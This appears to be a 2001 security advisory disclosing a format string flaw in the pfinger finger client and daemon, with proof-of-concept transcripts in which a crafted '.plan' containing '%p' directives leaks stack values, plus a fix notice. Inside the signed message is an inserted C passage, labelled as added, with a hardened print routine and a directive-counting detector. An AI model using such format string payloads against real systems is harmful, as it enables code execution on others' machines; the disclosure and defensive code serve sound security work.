OSEC

 
From: Benoît Roussel (benoit.rousselintexxia.com)
Date: Thu Dec 20 2001 - 12:39:52 CST


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    ________________________________________________________________________
    SECURITY ADVISORY INTEXXIA(c)
    18 12 2001 ID #1050-181201
    ________________________________________________________________________
    TITLE : pfinger Format String Vulnerability
    CREDITS : Guillaume Pelat / INTEXXIA
    ________________________________________________________________________

    SYSTEM AFFECTED
    ===============

            pfinger <= 0.7.7

    ________________________________________________________________________

    DESCRIPTION
    ===========

            pfinger is a finger daemon written in C. It contains a format
    string vulnerability.

    ________________________________________________________________________

    DETAILS
    =======

            Both the client and the server are vulnerable to format string
    injection, for example through a '.plan' file.

            Client side : the client passes the data received from the
    server directly as the format (first) argument of printf(3). A user
    could create a specially crafted '.plan' file that would be printed by
    the pfinger client. As a result, arbitrary code could be executed in
    the context of the client.

            Server side : if the server is configured to connect to a master
    server (with the <sitehost> directive), data received from the master
    server is used directly as the format (first) argument of printf(3). If
    a malicious user modifies the master so that it sends crafted data, it
    is possible to execute code on the vulnerable 'slave' server.

    If a user has an account on the master server, he can create a crafted
    '.plan' file containing the format string. A simple request to the
    'client' server would then also exploit the server side vulnerability.

            The pfinger daemon is launched with 'nobody' permissions by
    default. Complete exploitation of this vulnerability will permit an
    attacker to execute code with the 'nobody' permissions. But this flaw
    could be used to compromise the local system by exploiting other local
    vulnerabilities.
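    The following C snippet is an added illustration and is not code from
    pfinger or from the advisory. It shows the hardened form of the pattern
    the advisory describes (untrusted '.plan' or master-server text must be
    passed to printf(3) as an argument, never as the format) together with a
    small defensive check that counts conversion directives in untrusted
    text, which a daemon or log monitor could use to flag suspicious data.
    The function names `render_plan` and `count_conversions` and the sample
    plan text are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not pfinger's code.
 *
 * The bug in the advisory is the call  printf(plan)  where `plan` is text
 * read from a '.plan' file or from the master server. Because the data
 * becomes the *format* string, "%p" is interpreted as a directive and the
 * caller's stack is read (and with "%n", written).
 *
 * The hardened form below always supplies a fixed format and passes the
 * data as an argument, so "%p" in a .plan is emitted as the literal
 * characters "%p". For direct output, fputs(plan, stdout) is equivalent.
 */

/* Render untrusted plan text into `out` (size `outsz`) without ever
 * interpreting it as a format. Returns the snprintf(3) result, i.e. the
 * length that would have been written, so callers can detect truncation. */
int render_plan(const char *plan, char *out, size_t outsz)
{
    return snprintf(out, outsz, "%s", plan);
}

/* Defensive check for logging/alerting: count printf-style conversion
 * directives in untrusted text. "%%" is a literal percent sign and is not
 * counted; a lone trailing '%' is ignored. A non-zero count in a .plan
 * file or in a reply from the master server is worth flagging. */
int count_conversions(const char *s)
{
    int n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" -> literal '%', skip both */
            p++;
            continue;
        }
        if (p[1] == '\0')       /* trailing lone '%' */
            break;
        n++;                    /* any other "%x" is a directive */
    }
    return n;
}

int main(void)
{
    /* Constructed sample, modelled on the advisory's proof of concept. */
    const char *plan = "Now a little format string: %p %p %p :-)";
    char buf[128];

    render_plan(plan, buf, sizeof buf);
    printf("Plan:\n%s\n", buf);   /* prints the "%p"s literally */
    printf("conversion directives found: %d\n", count_conversions(plan));
    return 0;
}
```

    With the fixed format the sample plan is printed verbatim, whereas the
    advisory's transcript shows it being expanded into pointer values; the
    counter reports three directives for that same input and zero for text
    that only contains escaped "%%" signs.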

    ________________________________________________________________________

    PROOF OF CONCEPT
    ================

            Here are two proofs of concept, one for each side.

    Client side :

    eviltest:~$ cat ~/.plan
    Now a little format string: %p %p %p :-)
    eviltest:~$

    goodtest:~$ finger -l evil
    Login Name: evil In real life: Evil
    Login Name Status Login time Host
    evil Evil active Mon 08:02 test
    No mail.
    Plan:
    Now a little format string: 0x8049da0 0x640 0x400a252d :-)
    goodtest:~$

    Server side :

    goodtest:~$ cat /etc/fingerconf
    <fingerconf>
    <sitehost>master</sitehost>
    </fingerconf>

    evilmaster:~$ cat ~/.plan
    Now a little format string: %p %p %p :-)
    evilmaster:~$ telnet test 79
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    /W evil
    Login Name: evil In real life: Evil
    Login Name Status Login time Host
    evil Evil active Mon 08:02 master
    No mail.
    Plan:
    Now a little format string: 0xbfbff860 0x400 0x0 :-)
    Connection closed by foreign host.
    evilmaster:~$

    ________________________________________________________________________

    SOLUTION
    ========

            There is an official solution now. A new version has been
    released which corrects this security issue. pfinger version 0.7.8 is
    available at :

    http://www.xelia.ch/unix/pfinger/

    ________________________________________________________________________

    VENDOR STATUS
    =============

            18-12-2001 : This bulletin was sent to Michael Baumer.
            19-12-2001 : pfinger version 0.7.8 has been released which
                         solves this issue.

    ________________________________________________________________________

    LEGALS
    ======

            Intexxia provides this information as a public service and "as
    is". Intexxia will not be held accountable for any damage or distress
    caused by the proper or improper usage of these materials.

            (c) intexxia 2001. This document is property of intexxia. Feel
    free to use and distribute this material as long as credit is given to
    intexxia and the author.

    ________________________________________________________________________

    CONTACT
    =======

    CERT intexxia certintexxia.com
    INTEXXIA http://www.intexxia.com
    171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
    92024 Nanterre Cedex - France Fax : +33 1 55 69 78 80

    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

    iQA/AwUBPCIwdU2N8BNyNDXLEQI+MQCg9SuwuxrM3kaQVNT57trzLaPpTJQAn35u
    AhSwVUKGRGPoRmxqMcN1Ue/3
    =OctC
    -----END PGP SIGNATURE-----